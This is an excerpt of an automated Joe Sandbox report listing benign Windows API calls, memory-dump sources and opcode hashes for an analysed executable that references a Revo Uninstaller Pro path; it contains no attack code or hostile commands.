                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 1faced057133102e2a5c8c275d09ba896f9db863fa793feee7ea153b10559ce8
                                                                                                                                                                            • Instruction ID: b627d25ec95863442582b039d8f9afdf42e362a241546bedc56a59ba2f94c75e
                                                                                                                                                                            • Opcode Fuzzy Hash: 1faced057133102e2a5c8c275d09ba896f9db863fa793feee7ea153b10559ce8
                                                                                                                                                                            • Instruction Fuzzy Hash: 9EB012823AC340FC300A3183ED02C3A060DD3C0B14730C50FF0C0C54C6D4484C402031
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED217
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 2cd889d96560ca955e00b361a0123eda0b1d41bf68472524370b9431b686c45a
                                                                                                                                                                            • Instruction ID: b6dfcdf54a569a9a3d2f09071eb213de1b4dde541b0e691bb5b784ef68e88b85
                                                                                                                                                                            • Opcode Fuzzy Hash: 2cd889d96560ca955e00b361a0123eda0b1d41bf68472524370b9431b686c45a
                                                                                                                                                                            • Instruction Fuzzy Hash: F2B012C63A8240EC300652CBAC02F37030DF5C0B28730C41EF044C648ADC488C002131
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED217
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 9f4bf63dfa86c16707175fd912ac9ce592dcdb156560897735dcca144731552d
                                                                                                                                                                            • Instruction ID: 2bf2a20691d643b2f56a888b47fe0fe3550d4e54553331929255178574728c64
                                                                                                                                                                            • Opcode Fuzzy Hash: 9f4bf63dfa86c16707175fd912ac9ce592dcdb156560897735dcca144731552d
                                                                                                                                                                            • Instruction Fuzzy Hash: 21B012C63A8240EC300652CBAC02E37030DE5C0B28730C41EF444C6885D8488C002131
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED7D1
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: caef8bcdd461e1e5d15509571bb5323af59a248faec4c55b6c0ec78612722ac7
                                                                                                                                                                            • Instruction ID: 1eb3e83e2110d30c98657c27fa91f63363f60f37f2bf22325525ec88a6086f2b
                                                                                                                                                                            • Opcode Fuzzy Hash: caef8bcdd461e1e5d15509571bb5323af59a248faec4c55b6c0ec78612722ac7
                                                                                                                                                                            • Instruction Fuzzy Hash: 9BB0128A368340FC310612C3AD02C36131CD3C0F55730C50EF040C44CDD4404C402073
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED1B6
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 151e59cae88c3b5114d515f671e468d61894cf92f7da0c336caf1af6012fb4c9
                                                                                                                                                                            • Instruction ID: 525dacf917a2defdbd3934c8e2b29ac778070ca9dd97af23e139b930b418d9f9
                                                                                                                                                                            • Opcode Fuzzy Hash: 151e59cae88c3b5114d515f671e468d61894cf92f7da0c336caf1af6012fb4c9
                                                                                                                                                                            • Instruction Fuzzy Hash: 26A011823AC282FC300A2203AC02C3A020CC2C0B28330880EF0828888AA88808002030
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED1B6
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 0596b2a6ad4fecc5b5641ab6573f928e5cbdaec4b6c8d9209060846088d63eae
                                                                                                                                                                            • Instruction ID: 525dacf917a2defdbd3934c8e2b29ac778070ca9dd97af23e139b930b418d9f9
                                                                                                                                                                            • Opcode Fuzzy Hash: 0596b2a6ad4fecc5b5641ab6573f928e5cbdaec4b6c8d9209060846088d63eae
                                                                                                                                                                            • Instruction Fuzzy Hash: 26A011823AC282FC300A2203AC02C3A020CC2C0B28330880EF0828888AA88808002030
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED217
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: a047860da4960adf989d7afc24820ed2ed12386bfcdab3333626be73a3b00247
                                                                                                                                                                            • Instruction ID: 61b45e7c2d8ad89cdcd06455b2549fa6cac9d1630140f8afeaad60d01af0815d
                                                                                                                                                                            • Opcode Fuzzy Hash: a047860da4960adf989d7afc24820ed2ed12386bfcdab3333626be73a3b00247
                                                                                                                                                                            • Instruction Fuzzy Hash: E6A011CA2A8282FC300A2283AC02E3B030EC0C0B28330880EF0028A88AA88888002030
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED217
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: c14d19af53b7dd0bf05de69786ee96df700da70c3e39d6aaadf94c403355409f
                                                                                                                                                                            • Instruction ID: 61b45e7c2d8ad89cdcd06455b2549fa6cac9d1630140f8afeaad60d01af0815d
                                                                                                                                                                            • Opcode Fuzzy Hash: c14d19af53b7dd0bf05de69786ee96df700da70c3e39d6aaadf94c403355409f
                                                                                                                                                                            • Instruction Fuzzy Hash: E6A011CA2A8282FC300A2283AC02E3B030EC0C0B28330880EF0028A88AA88888002030
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED217
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 11919943dcaa05d5c906e9a407a72e68a602fa7e1f24e0ed89a74626312a3ff2
                                                                                                                                                                            • Instruction ID: 1b19c6545bfa7673efc58672e0d41292f2c3ddeff56a9a6c798d9f572c2d1302
                                                                                                                                                                            • Opcode Fuzzy Hash: 11919943dcaa05d5c906e9a407a72e68a602fa7e1f24e0ed89a74626312a3ff2
                                                                                                                                                                            • Instruction Fuzzy Hash: 55A011CA2A8280BC300A2283AC02E3B230EC0C0F28330880EF0008A88AA88888002030
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00FED1B6
                                                                                                                                                                              • Part of subcall function 00FED53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FED5B7
                                                                                                                                                                              • Part of subcall function 00FED53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FED5C8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 262fcd1d8f2a26ee5b7a9d6b914d76e96911a88586a58ed85b2feb23dfe860b8
                                                                                                                                                                            • Instruction ID: 525dacf917a2defdbd3934c8e2b29ac778070ca9dd97af23e139b930b418d9f9
                                                                                                                                                                            • Opcode Fuzzy Hash: 262fcd1d8f2a26ee5b7a9d6b914d76e96911a88586a58ed85b2feb23dfe860b8
                                                                                                                                                                            • Instruction Fuzzy Hash: 26A011823AC282FC300A2203AC02C3A020CC2C0B28330880EF0828888AA88808002030
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00FE9CE4,C:\Program Files\VS Revo Group\Revo Uninstaller Pro,00000000,010185FA,00000006), ref: 00FE9A91
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1611563598-0
                                                                                                                                                                            • Opcode ID: 676a2306a658b5a3ca153aa530d98cf6e4b8b5c767b03ec849fc1b8c6d86a3e1
                                                                                                                                                                            • Instruction ID: e9f176095c5bdd07656139433b9691a36ca2a46d81b7eba142e376d0909a6ad7
                                                                                                                                                                            • Opcode Fuzzy Hash: 676a2306a658b5a3ca153aa530d98cf6e4b8b5c767b03ec849fc1b8c6d86a3e1
                                                                                                                                                                            • Instruction Fuzzy Hash: 61A01230194006468A114B30C80DC1576515770702F0086207142C0094CB318810A600
                                                                                                                                                                            APIs
                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF,?,?,00FD94AA), ref: 00FD94F5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                            • Opcode ID: d3c1c01261f496d3bcae9985fa85932609916854cbee5e8650b7164e6885c9f8
                                                                                                                                                                            • Instruction ID: 372ba59d5bbad7658ebf9e3cccb3f0ecfcf7818660a9207358c893929caa74be
                                                                                                                                                                            • Opcode Fuzzy Hash: d3c1c01261f496d3bcae9985fa85932609916854cbee5e8650b7164e6885c9f8
                                                                                                                                                                            • Instruction Fuzzy Hash: 76F089708467044EDB318B64D549792B7E59B11735F0C8B2FD0E7476D0D3B5684DEB10
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FD12D7: GetDlgItem.USER32(00000000,00003021), ref: 00FD131B
                                                                                                                                                                              • Part of subcall function 00FD12D7: SetWindowTextW.USER32(00000000,010022E4), ref: 00FD1331
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00FEB04A
                                                                                                                                                                            • EndDialog.USER32(?,00000006), ref: 00FEB05D
                                                                                                                                                                            • GetDlgItem.USER32(?,0000006C), ref: 00FEB079
                                                                                                                                                                            • SetFocus.USER32(00000000), ref: 00FEB080
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 00FEB0C0
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00FEB0F3
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00FEB109
                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FEB127
                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FEB137
                                                                                                                                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00FEB154
                                                                                                                                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00FEB172
                                                                                                                                                                            • _swprintf.LIBCMT ref: 00FEB1A2
                                                                                                                                                                              • Part of subcall function 00FD3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FD3E54
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00FEB1B5
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00FEB1B8
                                                                                                                                                                            • _swprintf.LIBCMT ref: 00FEB213
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 00FEB226
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00FEB23C
                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00FEB25C
                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FEB26C
                                                                                                                                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00FEB286
                                                                                                                                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00FEB29E
                                                                                                                                                                            • _swprintf.LIBCMT ref: 00FEB2CF
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00FEB2E2
                                                                                                                                                                            • _swprintf.LIBCMT ref: 00FEB332
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 00FEB345
                                                                                                                                                                              • Part of subcall function 00FE9D99: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00FE9DBF
                                                                                                                                                                              • Part of subcall function 00FE9D99: GetNumberFormatW.KERNEL32(00000400,00000000,?,0100D600,?,?), ref: 00FE9E0E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                                                                            • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                                                            • API String ID: 797121971-1840816070
                                                                                                                                                                            • Opcode ID: f45cff89c270a26dd92895ab888d338320f826cce50b08ff895897f9ccc77127
                                                                                                                                                                            • Instruction ID: 44b1c30c479188e37e9acaf0ec5a8df53e3bcc56d9e5b460a7cf5035d884b20d
                                                                                                                                                                            • Opcode Fuzzy Hash: f45cff89c270a26dd92895ab888d338320f826cce50b08ff895897f9ccc77127
                                                                                                                                                                            • Instruction Fuzzy Hash: F591B472548349BFE232DBA1CC49FFB77ACEB89700F044819B789D6081D779AA049762
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 00FD6FCB
